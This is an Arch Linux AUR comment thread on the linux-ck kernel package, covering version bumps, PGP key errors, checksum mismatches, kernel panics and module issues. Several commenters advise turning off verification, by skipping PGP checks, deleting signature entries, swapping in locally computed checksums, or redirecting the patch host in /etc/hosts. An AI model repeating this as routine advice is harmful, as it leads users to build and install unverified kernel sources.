v4.5.x series, please let me know. I'm running on Skylake platform, maybe this platform needs more testing? :P Thanks again! kyak commented on 2016-04-19 14:54 @graysky - thank you, all works fine now! As for rename, i'm not pushing at all; this is just something to keep in mind. Thanks again! QuartzDragon commented on 2016-04-19 12:59 Greetings graysky, Some users on the BFQ mailing list have tested the v7r11 4.4.0 patches on 4.5.0 kernel and have found they work without any issues. I've also tested for myself with a modified PKGBUILD and found they work stably and without any issues or quirks compared to CFQ, no matter my system load or uptime. I guess your plans are to wait for the official patches?, thanks! But virtualbox-ck-host-modules-ivybridge and virtualbox-host-modules-arch are conflicting now. How should we handle this? By the way, does it make sense to change the naming convention in accordance to upstream - i.e. virtualbox-host-modules-ck-ivybridge ?, I tried the steamos-xpad driver. Error! There are no instances of module: steamos-xpad 20160103 located in the DKMS tree. error: command failed to execute correctly I tried deleting the xpad.ko.gz file from 4.4.6-1-ck kernel with no luck. Bump to v4.4.6-1 Changelog: Commit: LinuxChanges: NOTE -- Even though CK has released BFS for linux v4.5.x, there is not a corresponding BFQ I/O scheduler for this series yet so please don't flag out-of-date until Paolo has done so. I'm not sure if this is what you meant, but graysky doesn't create the ck patchset; Con Kolivas does. See: graysky puts together the AUR linux-ck PKGBUILD once Con Kolivas releases updated versions of the patchset. @ thevictoryiswon gpg --recv-keys ABAF11C65A2970B130ABE3C479BE3E4300411886 647F28654894E3BD457199BE38DBBDC86092693E Distorted commented on 2016-03-09 08:59 @thevictoryiswon Look at some of the older comments, your issue has come up numerous times. thevictoryiswon commented on 2016-03-09 04:00 It will not build for me. Has it been corrupted? ==> Verifying source file signatures with gpg... linux-4.3.tar ... FAILED (unknown public key 79BE3E4300411886) patch-4.3.6 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! WFV commented on 2016-03-06 23:13 Thanks graysky and FadeMind, rebuild worked. FadeMind commented on 2016-03-06 21:50 @WFV kernel images have stored systemd version from time creating of image kernel. For bump this run just sudo mkinitcpio -P and reboot. Alternative: ignore this or add to grub conf file /etc/default/grub in line GRUB_CMDLINE_LINUX rd.udev.log-priority=3 for prevent print systemd version during boot. Update grub after made changes in a conf file OFC. Look like there is some problem with working intel i965 driver with 4.3.6-1-ck kernel. Xorg cursor does not render. However there are no errors in xorg log. Changing acceleration method to old uxa fixs the problem. All ok with arch vanila kernel (4.4.1). Anonymous comment ==> Verifying source file signatures with gpg... linux-4.3.tar ... FAILED (unknown public key 79BE3E4300411886) patch-4.3.4 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! ==> ERROR: Makepkg was unable to build linux-ck. ==> Restart building linux-ck ? [y/N] - I try to be as true to the Arch config as I can be for linux-ck. You are of course free to customize/build your own. My suggestion is for you to open a flyspray again the official Arch linux package asking for this. Might want to include your reasoning why it would be important. XenGi commented on 2015-12-14 10:51 hi, Could you set CONFIG_CHECKPOINT_RESTORE=y for all ck kernels? I'm using the broadwell build from repo-ck. This would enable fancy process names for LXC. The setting is not set atm. ``` $ zgrep 'CONFIG_CHECKPOINT_RESTORE' /proc/config.gz # CONFIG_CHECKPOINT_RESTORE is not set ``` Here's a thread explaining the issue: I got this weird message when entering boot process: [ 47.772679] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 52.807884] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 57.842769] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 62.877924] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 67.912998] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 72.947899] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 77.982966] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 83.017963] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 87.661070] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). [ 88.053001] r8169 0000:03:00.0 enp3s0: rtl_counters_cond == 1 (loop: 1000, delay: 10). It still showing up when I check from dmesg. The message only appear when I use ck kernel. Is there something wrong with ck kernel? For all those with this problem in dmesg/bootup: [drm:intel_pipe_config_compare [i915]] *ERROR* mismatch in has_drrs (expected 1, found 0) Theres also a warning, I dont know if it is related: WARNING: CPU: 1 PID: 6 at drivers/gpu/drm/i915/intel_display.c:12700 intel_atomic_commit+0xdea/0x1390 [i915]() Bug submittet here: linux-ck is main package for GENERIC (ALL) CPU's and OFC can be adjust BEFORE compile. Customized by CPU names are designed for powerfull CPU's AMD and Intel See: are available on repo-ck.com repo site. IF You have installed linux-ck-ivybridge You have two options: 1. Download sources of linux-ck and custom config file for enable valid CPU family for GCC and compile it. 2. Purge whole -ck packages (linux-ck-ivybridge, bbswitch-ck, and nvidia-ck-ivybridge) 3. Purge and install again bbswitch-ck package (major linux version bumped from 4.1 to 4.3 and package NEED to be recompilled against 4.3) 4. Install new version of nvidia-ck version ready for 4.3 OR JUST WAIT for upload proper packages in to repo-ck repository. SUBFORUM of AUR packages IS designed for report ISSUES with PKGBUILD/package build issues. FOR help with Your misunderstanding of the issues please write directly on BBS Arch Forums: Reference And one more: stop spamming and confuse users of other packages (bbswitch-ck). kyak commented on 2015-11-13 18:11 @Distorted i think i get it now. I should wait for the latest version of linux-ck-ivybridge to hit the repo-ck. After that i'd have something that provides linux-ck=4.3 and be able to install bbswitch-ck. I didn't realize i was still using linux-ck-ivybridge 4.1.3 Distorted commented on 2015-11-13 18:01 @kyak also, did you rebuild the bbswitch-ck package? i updated it for the new version. Distorted commented on 2015-11-13 18:00 @kyak You could probably edit the bbswitch-ck PKGBUILD file and change depends=linux-ck to depends=linux-ck-ivybridge Unless they changed the actual name of the kernel, not just the package. If this is not the case, the linux-ck-ivybridge pkgbuild should say provide='linux-ck=4.3' to solve these kinds of problems.:42 Read carefully: conflicts=('kernel26-ck' 'linux-ck-corex' 'linux-ck-p4' 'linux-ck-pentm' 'linux-ck-atom' 'linux-ck-core2' 'linux-ck-nehalem' 'linux-ck-sandybridge' 'linux-ck-ivybridge' 'linux-ck-broadwell' 'linux-ck-haswell' 'linux-ck-kx' 'linux-ck-k10' 'linux-ck-barcelona' 'linux-ck-bulldozer' 'linux-ck-piledriver' 'linux-ck-silvermont') Duh? :) Distorted commented on 2015-11-13 15:28 @kyak There are probably some packages that depend on linux-ck-ivybridge that are the cause this error. kyak commented on 2015-11-13 15:16 Running pacaur -Syu: :: linux-ck and linux-ck-ivybridge are in conflict (linux-ck). Remove linux-ck-ivybridge? [y/N] :: unresolvable package conflicts detected :: failed to prepare transaction (conflicting dependencies) :: linux-ck and linux-ck-ivybridge are in conflict Duh? FadeMind commented on 2015-11-12 21:12 Self compilled with custom modules list (modprobed_db). Linux version 4.3.0-1-ck (tomasz@arch) (gcc version 5.2.0 (GCC) ) #1 SMP PREEMPT Thu Nov 12 21:46:41 CET 2015 custom modules list for my device: kernel tree: enabled blk-mq via grub flag (scsi_mod.use_blk_mq=1) (working like a charm - better than noop) dmesg: config: Good work CK and Graysky! graysky commented on 2015-11-12 19:41 Bump to v4.3-1 Changelog: Commit: LinuxChanges: Note: I am working on the related packages now (broadcom, nvidia, vbox) and I will upload to the repo once I get some feedback from AUR users as to stability so please use the AUR page to report in if something is bad (or good)! This part of the patch is not good: - sha256sums = 819961379909c028e321f37e27a8b1b08f1f1e3dd58680e07b541921282da532 + sha256sums = cf0f984ebfbb8ca8ffee1a12fd791437064b9ebe0712d6f813fd5681d4840791:38 Hi graysky, The repo download speed is doing pretty badly. Even with several Server lines in pacman.conf. Even worse, the download doesn't resume from the same place. At maximum i was able to download around 1000 Kb, and the download starts over and over again from the beginning of the file. It's been like that for a couple of days now (can't update to v4.1.9-1). It would be great if you could have a look. Thank you! I'm running with NUMA disabled and with ck patch for reverting unplugged [1]. I'm fairly stable with BFQ enabled and on BTRFS. I'll post if I got issues. Test: Normal work day, scrubs on BTRFS, kernel compilation. [1] dkaylor commented on 2015-08-05 10:53 I may have spoken too soon. System had been up and running for about 30 hours with no trouble. Then did a pacman -Syu (with linux-4.1.4 and systemd-224) and got a panic right in the middle of the kernel image generation. Reboot, cold boot, nothing helped. Panic then hang. And generic kernel image generation didn't finish, so system was toast. Will try a repair with ISO before, but wiki instructions seem dodgy. Probably should have saved pacman work for the generic kernel, lesson learned. Regarding NUMA - I've been running a custom linux-ck 4.1.4-1 with NUMA disabled and haven't had any hangs. Everyday workloads, several suspend/resume cycles. On the same hardware, I had to turn NUMA off on 4.0.x to get it to run. Machine is Core2 Quad. modprobed_db use _ instead of - for naming modules. You mixed up this. Corrected modules list: dm_bio_prison dm_bufio dm_cache dm_cache_mq dm_crypt dm_log dm_mirror dm_mod dm_persistent_data dm_region_hash dm_snapshot marceliq commented on 2015-08-04 09:31 Hi, I run into some trouble. Im using localmodconf. In my modprobed.db file I can see modules: dm_bio_prison dm_bufio dm-cache dm-cache-mq dm_crypt dm_log dm_mirror dm_mod dm_persistent_data dm_region_hash dm-snapshot But after compilation, while installing new package when building new init image I get this: >>> Updating module dependencies. Please wait ... >>> Generating initial ramdisk, using mkinitcpio. Please wait... ==> Building image from preset: /etc/mkinitcpio.d/linux-ck.preset: 'default' -> -k /boot/vmlinuz-linux-ck -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-ck.img ==> Starting build: 4.1.4-1-ck -> Running build hook: [base] -> Running build hook: [udev] -> Running build hook: [autodetect] -> Running build hook: [modconf] -> Running build hook: [block] -> Running build hook: [encrypt] -> Running build hook: [lvm2] ==> ERROR: module not found: `dm-snapshot' ==> ERROR: module not found: `dm-mirror' ==> ERROR: module not found: `dm-cache' ==> ERROR: module not found: `dm-cache-mq' -> Running build hook: [filesystems] -> Running build hook: [keyboard] -> Running build hook: [fsck] ==> Generating module dependencies ==> Creating lzop-compressed initcpio image: /boot/initramfs-linux-ck.img ==> WARNING: errors were encountered during the build. The image may not be complete. Any suggestions? Thanks. When you see "ERROR: One or more PGP signatures could not be verified!" then import the required keys with: gpg --keyserver keys.gnupg.net --recv-keys ABAF11C65A2970B130ABE3C479BE3E4300411886 647F28654894E3BD457199BE38DBBDC86092693e graysky commented on 2015-06-30 19:30 Bump to v4.0.7-1 Changelog: Commit: zoopp commented on 2015-06-25 17:28 I might have found something regarding the Kernel Panic. I usually compile (with the NUMA patch enabled) using native optimizations detected by gcc and I disable kernel debugging. Today I updated and forgot to disable kernel debugging and for the first time since this issue arose I got the kernel panic. I then recompiled with kernel debugging disabled and the kernel panic was gone. Not sure if this is going to be of any use but I'll leave it here just in case. OK. Given all the reports of problems with ck1 and 4.0.x, I have decided to push version 3.19.6 to the AUR (and all associated packages now depend on 3.19.x). If you experienced a kernel panic using linux-ck v4.0.x, please see this post and consider if you can help Con debug: For those interested in the 4.0.x version of PKGBUILDs, I have made them available on repo-ck at this address: PLEASE DO NOT FLAG OUT-OF-DATE UNTIL CK FIXES THE PANICS - I WILL NOT PUSH THE AUR OR REPO UNTIL IT IS STABLE! After update linux-ck-nehalem x86_64 from 3.19.5-1 to 4.0-1 there is a kernel panic at boot or later. linux 4.0.0-2-ARCH from testing repo working properly, Jak zdobędę więcej informacji to umieszczę je tutaj, i'am not able to build the ck kernel. there was never a problem since 3.12 up to 3.19.3... => kernel/Makefile:132: *** No X.509 certificates found *** my problem in short: how can i get the needed keys? [tom@frija linux-ck]$ makepkg -rsie --skippgpcheck ==> Making package: linux-ck 3.19.5-1 (Tue Apr 21 20:24:34 SKIPPED include/generated/compile.h kernel/Makefile:132: *** No X.509 certificates found ***[1]: *** Es wird auf noch nicht beendete Prozesse gewartet... CC security/integrity/iint.o Makefile:943: recipe for target 'arch/x86' failed make: *** [arch/x86] Error 2 make: *** Waiting for unfinished jobs.... CHK kernel/config_data.h CC security/keys/gc.o LD security/integrity/integrity.o LD security/integrity/built-in.o CC security/yama/yama_lsm.o CC security/keys/key.o CC security/keys/keyring.o CC security/keys/keyctl.o LD security/yama/yama.o LD security/yama/built-in.o CC security/commoncap.o CC security/keys/permission.o CC security/keys/process_keys.o CC security/keys/request_key.o CC security/keys/request_key_auth.o CC security/min_addr.o CC security/keys/user_defined.o CC security/security.o CC security/keys/compat.o CC security/keys/proc.o CC security/keys/sysctl.o CC security/capability.o CC security/keys/persistent.o CC security/keys/big_key.o CC security/inode.o CC security/device_cgroup.o LD security/keys/built-in.o LD security/built-in.o ==> ERROR: A failure occurred in build(). Aborting... graysky commented on 2015-04-19 14:36 Bump to v3.19.5-1 Changelog: Commit: FadeMind commented on 2015-04-19 09:08 graysky commented on 2015-04-18 19:27 @Buddlespit - Why out-of-date? See my comment from 2015-04-16 21:11. graysky commented on 2015-04-17 19:14 @fademind - dunno what to tell you; running fine on my systems (haswell and ivy with onboard video). @all - heard back from Paolo about BFQ for 4.0. Arianna and he are testing a new patch that is specifically for 4.0 so I don't plan to bump linux-ck until that happens. You can continue using the version I have linked below if you wish until then. FadeMind commented on 2015-04-17 19:11 @graysky After disabing zramswap. Boot, sddm splash, loading desktop, no wallpaper - black background, freeze mouse and keyboard, capslock key led flash in pulse. I can't do anything except hard poweroff. Keyboard and mouse not respond. Kernel panic is before SDDM startup... IMO it is Intel DRM regression... weird. graysky commented on 2015-04-17 18:53 @fademind - I dunno about your setup but I see somr zram lines in your dmesg. Disable zram and try again? Also, if you boot to the shell and not to sddm, does it panic? If not, can you start your xsession without sddm by running `xinit` and see if it happens. Trying to isolate which part is causing the hang. I'm used Your SRC. After compilling, reboot and boot from linux-ck I have freeze under X11.. Note: I booted from 3.19.4-ck kernel and PASS fine. graysky commented on 2015-04-16 21:11 I generated a PKGBUILD+related files for linux-ck-4.0 using ck1-4.0 and using the 3.19.x series of BFQ since there is one report on the BFQ forum that this version works fine in the 4.0 code[1]. You may download it and build/test from this file: I also emailed Paolo to see if this is the official word from his group. I don't want to put linux-ck-4.0 live in the AUR/repo until we hear back from him. Please test this out if you wish and report back good or bad. 1. graysky commented on 2015-04-16 20:57 @FadeMind - So the only difference is ck1 patchset? Are you using BFQ at all? FadeMind commented on 2015-04-16 14:53 I built own kernel 4.0 with lastest ck patch and I had random kernel panic during boot with hangs. After reboot I had recovery journal of disk. Sometimes is fine, sometimes just hangs and blow up. Safe is waiting for 4.0.1 release update 4.0 kernel series. ON Stock 4.0 sersies ARCH kernel this never happened. the 3.19.4 pkgbuild doesn't work for me [code]LC_ALL=C makepkg -rsie --skippgpcheck ==> Making package: linux-ck 3.19.4-1 (Tue Apr 14 17:01:00 kernel/Makefile:132: *** No X.509 certificates found *** CHK kernel/config_data.hfile:943: recipe for target 'arch/x86' failed make: *** [arch/x86] Error 2 make: *** Waiting for unfinished jobs.... ==> ERROR: A failure occurred in build(). Aborting... [/code] There are other ways, too. First off, you don't have to trust the keys. Second, you can automate downloading them in gpg.conf --skippgpcheck is a joke. If you're too lazy to figure out how to use gpg, you shouldn't be building your kernel, to say the least. Twilight_Genesis commented on 2015-04-09 23:47)(Not recommended) Have makepkg skip PGP signature checking just pass the --skippgpcheck argument to makepkg makepkg --skippgpcheck -r -s Twilight_Genesis commented on 2015-04-09 23:45 -r -s Twilight_Genesis commented on 2015-04-09 23:41 2 Ways To fix PGP key errors: (Recommend): Twilight_Genesis commented on 2015-04-09 23:19 @radialhat: You have to either import the PGP keys in the validpgpkeys array in the PKGBUILD and trust them or if you don't care about the PGP signatures then you can pass the --skippgpcheck argument to makepkg and have it ignore the PGP signatures. Funny you all are having problems with the pgp key. I brought this up some time ago and was given a bunch of BS about why it "should" work as if I already didn't know it "should". Anyways... I've been seeing this wonderful additional problem with the "enable patch" that for some reason is also being disregarded so here's how to fix it. When you compile the package it's nice to see someone has left or did something stupid (yet again) where the file "enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz" is actually not ending in ".gz". Awesome huh? So what you have to do is this. Rename the file removing the ".gz" part and copy it to the "src" directory where you're building (you can't do this through the yaourt build because you need to intervene beyond editing the PKGBUILD). Recap: - run makepkg -rs (if this is how you do it) - ignore errors since this is becoming commonplace with this package anyway - edit PKGBUILD and remove .sig and .sign PGP crap since no one wants to implement this right anyway - mv enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch - update sha256sums => (4th line down) "e5b0f1882861cb1d0070e49c41a3e7390cf379f183be0bddb54144ecc68fb8f9" - cp enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch to ./src (you should be in the directory you're compiling) - Sit back and wait for fresh kernel and enjoy tjuh ~ $ gpg --keyserver hkp://keys.gnupg.net --recv-keys 00411886 6092693E gpg: directory '/home/tjuh/.gnupg' created gpg: new configuration file '/home/tjuh/.gnupg/gpg.conf' created gpg: WARNING: options in '/home/tjuh/.gnupg/gpg.conf' are not yet active during this run gpg: keybox '/home/tjuh/.gnupg/pubring.kbx' created gpg: keyserver receive failed: No keyserver available Same warning :S Execute this command: gpg --keyserver hkp://keys.gnupg.net --recv-keys 00411886 609 Tjuh commented on 2015-03-27 11:45 ==> Verifying source file signatures with gpg... linux-3.19.tar ... FAILED (unknown public key 79BE3E4300411886) patch-3.19.3 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! ==> Removing installed dependencies... checking dependencies... Packages (1) bc-1.06.95-1 Total Removed Size: 0.18 MiB :: Do you want to remove these packages? [Y/n] y (1/1) removing bc [######################] 100% tjuh ~/Downloads/linux-ck $ gpg --recv-keys 79BE3E4300411886 gpg: keyserver receive failed: No keyserver available tjuh ~/Downloads/linux-ck $ gpg --recv-keys 38DBBDC86092693E gpg: keyserver receive failed: No keyserver available Anyway to fix this? I tried running dirmngr </dev/null as root and then those 2 gpg commands again, but the keyserver is still not available. Anonymous comment on 2015-03-26 21:21 Thanks Sir_Lucjan, Graysky and Sir.Tiddlesworth -- removed my comments for errors, it was my mistakes. Fixed download interruption using tip on repo-ck wiki and had to add keys as root (not sure why using sudo wasn't working). Finally I am on ck-kx :) sir_lucjan commented on 2015-03-26 21:19 @jackpot as normal user sir_lucjan commented on 2015-03-26 21:19 jackpot Anonymous comment on 2015-03-26 21:18 #dirmngr </dev/null : keyserver receive failed: No keyserver available graysky commented on 2015-03-26 21:17 Bump to v3.19.3-1 Changelog: Commit: sir_lucjan commented on 2015-03-26 20:50 @jackpot: Anonymous comment on 2015-03-26 20:47 Thanks SirTiddle. It worked but repo-ck download speed is pain in the eyes. When doing it via AUR, its again: ==> Verifying source file signatures with gpg... linux-3.19.tar ... FAILED (unknown public key 79BE3E4300411886) patch-3.19.3 ... FAILED (unknown public key 38DBBDC86092693E) :S Sir.Tiddlesworth commented on 2015-03-26 11:39 @jackpot Run the following as root, then try again. # dirmngr </dev/null Anonymous comment on 2015-03-20 10:59 @graysky: Thanks for reply. Actually I posted after every option I could find failed. When I try to add keys as mentioned in repo-ck.com I get following: Quote: gpg: connecting dirmngr at '/root/.gnupg/S.dirmngr' failed: IPC connect call failed gpg: keyserver receive failed: No dirmngr ==> ERROR: Remote key not fetched correctly from keyserver. Unquote This is happening since 2 weeks (i.e. the time I have been trying different things) graysky commented on 2015-03-19 22:58 @jackpot - See the instructions on which should fix you up. Anonymous comment milan385 add these PGP keys: sir_lucjan commented on 2015-03-08 12:08 ==> Verifying source file signatures with gpg... linux-3.19.tar ... Passed patch-3.19.1 ... Passed ==> Entering fakeroot environment... ==> Creating source package... -> Adding PKGBUILD... -> Generating .SRCINFO file... -> Adding config.x86_64... -> Adding config... -> Adding linux-ck.preset... -> Adding change-default-console-loglevel.patch... -> Adding install file (linux-ck.install)... -> Compressing source package... ==> Leaving fakeroot environment. ==> Source package created: linux-ck (Sun Mar 8 13:07:38 CET 2015) milan385 commented on 2015-03-08 11:59 Have those keys in my keyring... sir_lucjan commented on 2015-03-08 11:52 milan385 commented on 2015-03-08 11:51 Now it's stuck in this moment: "Verifying source file signatures with gpg... linux-3.19.tar ... " graysky commented on 2015-03-08 11:29 Grrr... sorry about that. I refreshed the PKGBUILD for the correct checksum. The issue was that it was in fact correct, but at that time I didn't push the local copy to the repo. I then manually did so when pedrogabriel posted but the sum in the PKGBUILD was reindex against the old version. Anyway, it's right now. same issue as DaMoo. Changed sha256 as per below: --- PKGBUILD 2015-03-07 20:44:57.330121134 -0600 +++ PKGBUILD.orig 2015-03-07 20:45:26.940364828 -0600 @@ -78,7 +78,7 @@ '3dbf80df9a81a285baa5188ea8d768110f24a3e4fe8bd37e1c9d7410d60a680b' 'SKIP' '6d3043360485bbf3b8b6b780d62ff529074489e6a4d0086607de873d1278c031' - 'deacee3a3d9b06bc2aae74d908cef183dd39c4f3049567c488950f019ec95d79' + '5c3067b83d526f02be9173b92451a4b259e6245a1ee22f854cbf75b4001037d1' 'aad4a85e81b26bb7e4f44f7f1d307e812b2d02672673363a8c7acdd1174b99be' '99993989d38c452388458648ee354679d1e7763e216a06573e0b579cbf787e69' '2b3ebf5446aa3cac279842ca00bc1f2d6b7ff1766915282c201d763dbf6ca07e' DaMoo commented on 2015-03-08 01:29 I'm having an issue where a patch is failing to pass a sha256 integrity check. Here's the output from my AUR helper: ==> Validating source files with sha256sums...! :: failed to verify linux-ck integrity commented on 2015-02-28 21:24 Hello, got this error today: ==> Verifying source file signatures with gpg... linux-3.19.tar ... FAILED (unknown public key 79BE3E4300411886) ==> ERROR: One or more PGP signatures could not be verified! ==> ERROR: Makepkg was unable to build linux-ck. Rgds. In PKGBUILD of linux-ck all is fine. [tomasz@arch ~]$ export LC_ALL=C;pacman -Qo modprobed-db /usr/bin/modprobed-db is owned by modprobed-db 2.26-1 [tomasz@arch ~]$ export LC_ALL=C;pacman -Ql modprobed-db modprobed-db /usr/ modprobed-db /usr/bin/ modprobed-db /usr/bin/modprobed-db modprobed-db /usr/bin/modprobed_db modprobed-db /usr/share/ modprobed-db /usr/share/licenses/ modprobed-db /usr/share/licenses/modprobed-db/ modprobed-db /usr/share/licenses/modprobed-db/LICENSE modprobed-db /usr/share/man/ modprobed-db /usr/share/man/man8/ modprobed-db /usr/share/man/man8/modprobed-db.8.gz modprobed-db /usr/share/modprobed-db/ modprobed-db /usr/share/modprobed-db/modprobed-db.skel modprobed-db /usr/share/zsh/ modprobed-db /usr/share/zsh/site-functions/ modprobed-db /usr/share/zsh/site-functions/_modprobed-db hepha commented on 2015-02-27 15:16 hello /usr/bin/modprobed_db not /usr/bin/modprobed-db if [ -e /usr/bin/modprobed-db ]; then [[ ! -x /usr/bin/sudo ]] && echo "Cannot call modprobe with sudo. Install via pacman -S sudo and configure to work with this user." && exit 1 sudo /usr/bin/modprobed-db recall fi Hi graysky, When using your repo, download if often aborted with "transfer closed with XXX bytes remaining to read" - due to slow speed. Previsously it was possible to just "pacman -Syu" again and the download would resume where it had been stopped. But now the download is always started from the beginning. I'm struggling now to download 10 Mb of linux-ck-ivybridge-3.18.7-2 - even for such small size, i had to "pacman -Syu" several times, untill it succeded (the download is always started from the beginning). Anyway. Did you think about "Donate" button that would probably help you improve the infrastructure a little bit? Easy way, just host your own mirror and use your favourite AUR tool: $ echo "127.0.0.1 algo.ing.unimo.it" >> /etc/hosts $ mkdir ~/patches $ cd ~/patches $ mkdir -p people/paolo/disk_sched/patches/3.18.0-v7r7/ (download patches from there) $ python2 -m SimpleHTTPServer 80 $ pacaur -S linux-ck :) graysky commented on 2015-02-07 12:30 I am hosting the BFQ patches until their site is back up. Access them like so: 1) Download the linux-ck source tarball, untar it, enter the linux-ck directory 2) sed -i 's|^_bfqpath=.*$|_bfqpath=\"\"|' PKGBUILD One of the patches fails to download from the algo.ing.unimo.it mirror: ==> ERROR: Failure while downloading 0001-block-cgroups-kconfig-build-bits-for-BFQ-v7r7-3.18.patch Suggest using the repo-ck mirror for this until things are fixed. graysky commented on 2015-01-17 14:06 prakharsingh95 commented on 2015-01-17 13:38 Tjuh commented on 2015-01-17 13:15 Trying to build this, but it fails at verifying some files: ==> Verifying source file signatures with gpg... linux-3.18.tar ... FAILED (unknown public key 79BE3E4300411886) patch-3.18.3 ... FAILED (unknown public key 38DBBDC86092693E) ==> ERROR: One or more PGP signatures could not be verified! ==> Removing installed dependencies... commented on 2015-01-09 21:05 Hi, The installation broke with this new tar! I built the previous tarball for this version, and I have installed that, but not rebooted. I deleted all my previous builds. That should boot right? I mean sig files are just for verification. Bump to v3.18.2-1 Changelog: Commit: Note: This PKGBUILD now conforms to the pacman-4.2 standards of being able to verify pgp signatures of upstream files. See the following for info on how to add the needed keys or how to disable this feature entirely,[1] 1. graysky commented on 2015-01-04 14:21 sir_lucjan commented on 2015-01-04 13:59 sp1d3rmxn commented on 2015-01-04 13. 0 0 0 0 0 0 0 0 --:--:-- 0:00:59 --:--:-- 0curl: (22) The requested URL returned error: 503 Service Unavailable ==> ERROR: Failure while downloading 0001-block-cgroups-kconfig-build-bits-for-BFQ-v7r7-3.18.patch Aborting... sp1d3rmxn commented on 2015-01-04 13. prakharsingh95 commented on 2015-01-03 14:32 Hi, I have been using 3.18.1-3-ck since Dec 26, and I have (thank God) not experienced any lockups, freezes, or wierd stuff. Can anyone elaborate on this issue, or steps to replicate as I would degrade my kernel version. I am using broadcom-wl-ck. I have an i7-3610QM. Bump to v3.18.1-3 Changelog: Build against new BFQ patchset (v7r7). Commit: Note: I am not yet implimenting the linux-ck equivalent of 'verify source signatures[1]' due to a bug affecting mkaurball[2]. 1. 2. graysky commented on 2014-12-22 18:48 Bump to v3.18.1-3 Changelog: Build against new BFQ patchset (v7r7). Note: I am not yet implimenting the linux-ck equivalent of 'verify source signatures[1]' due to a bug affecting mkaurball[2]. Commit: 1. 2. Update3: 3.18.1 has just been released and I have updated the source tarball for those of you wishing to compile it up on your own. A reminder that all of the other *-ck packages I maintain have now been updated and are also available on repo-ck BOTH as source tarballs and (for generic x86_64 only) as compiled packages - note that the compiled package of 3.18.1-ck-1 will be updated shortly. *Source tarballs: *Pre-build 3.18-ck packages (x86_64 only): graysky commented on 2014-12-15 19:12 Update2: I now have all packages updated to build against 3.18-ck-1 including broadcom-wl-ck. Find the source package for it in the same place as I indicated below. Note - I do not have a broadcom wireless chipset so I cannot test the module. I can modprobe it and it does insert. Can someone with this hardware try it and report back? graysky commented on 2014-12-14 17:51 Update: All packages except for broadcom-wl-ck have been updated to work with 3.18.0-1-ck. Again, I will wait to diff the linux-ck PKGBUILD and associated files against the official ARCH version once it publishes, but those wishing to upgrade to 3.18.0-1-ck now can either build your own from the src tarballs or use pre-build the packages you can download directly with `pacman -U` if you wish. Otherwise, just keep waiting for the official release. *Source tarballs: *Pre-build 3.18-ck packages (x86_64 only): Dunno how long as CK does this in his spare time. For reference: BFS for v3.16 = 13 days BFS for v3.15 = 26 days BFS for v3.14 = 36 days BFS for v3.13 = 18 days BFS for v3.12 = 15 days BFS for v3.11 = 7 days BFS for v3.10 = 10 days BFS for v3.9 = 8 days BFS for v3.8 = 13 days BFS for v3.7 = 4 days BFS for v3.6 = 12 days BFS for v3.5 = 10 days BFS for v3.4 = 12 days I believe it's an issue with ccache and btrfs on SSD. When I disable the ccache it works. The problem is I'm getting a kernel panic so compilation stops half-way. After hard-reset I clean out the src and pkg directory and restart the compilation. Then I am assuming the objects are half created and I hit again a compilation error (not kernel-panic). It's an obscure case so comments in AUR might not be the proper place to solve this. @Tjuh. I faced a similar issue. Just boot into arch default, plug in all your peripherals and get them working, and then build linux-ck with localmodconfig=y. Everything will work out of the box them. @graysky. Is it possible for you to enable SCSI, USB, etc by default (ie add an option to PKGBUILD like minimal_support=y)? graysky commented on 2014-10-10 16:25 Odds are that using that option, you did not compile in USB support. I suggest using modprobe-db if you haven't already done so. Boot into a kernel with all modules, load those you will need, ie insert the external USB drive, populate the db and try rebuilding. Please please, add a warning in big bold letters for people like me who just want to use localmodcfg and minimal nconfig. I compiled 7 times before, got kernel failed to load errors, googled, fixed them myself, and still no USB. Finally I realized that the USB announce and support options were unchecked. Phew.: I get the same sha256sum as you but the PKGBUILD contains a different one (4c44ad820fae8afaf3ad55fa7b191cc15e61829293a074126be780a35275b7c6). clfarron4 commented on 2014-09-18 11:13 @coderkun: What do you get as the sum for that file? I get this: % sha256sum enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz a9ca0e6fc01a3d34058b6cc9cdb560f62233f2eca5917db65dc0b29772bb236e enable_additional_cpu_optimizations_for_gcc_v4.9+_kernel_v3.15+.patch.gz Thanks graysky. Which leads me to a question - SMT nice aside, if I have a non-SMT processor (4 cores = 4 threads, nice and simple) does disabling SMT in the kernel config accomplish anything, other than saving a little overhead? What's your opinion on heavily customized kernel configs in general? so as bfs 450 now includes the smt nice work, will I be able to turn it off in the kernel config? I have a non-hyperthreaded core2 quad, so I always turn off SMT scheduling, although I'm not sure it matters much. ck mentions a bfs450-nosmt-buildfix.patch to make it impossible to enable SMT nice on a non-SMT kernel, but not sure it's included in the PKGBUILD. I'm fine with just disabling it in the config. Thanks so much by the kernel Graysky. I'm a folding at home user (), that try improves F@H performance, every time trying new kernels. Sometime ago, about 3.10.1 your kernel was not good to folding. At this time, only in one test, it were the worst, I'm trying NUMA=ON and NUMA=OFF differences, and, withing your changes, and "kernel's studying" in a while, only ck will fold on my pc. But... when you will bump the pkgver? Any date? graysky commented on 2014-08-01 13:42 Note that CK just posted an experimental patch that in his words, "Works for me flawlessly on all my stuff, but it's still pretty new." You can read about it at the link below. I don't want to enable it by default in the repo but do want to allow users a chance to try it out in the 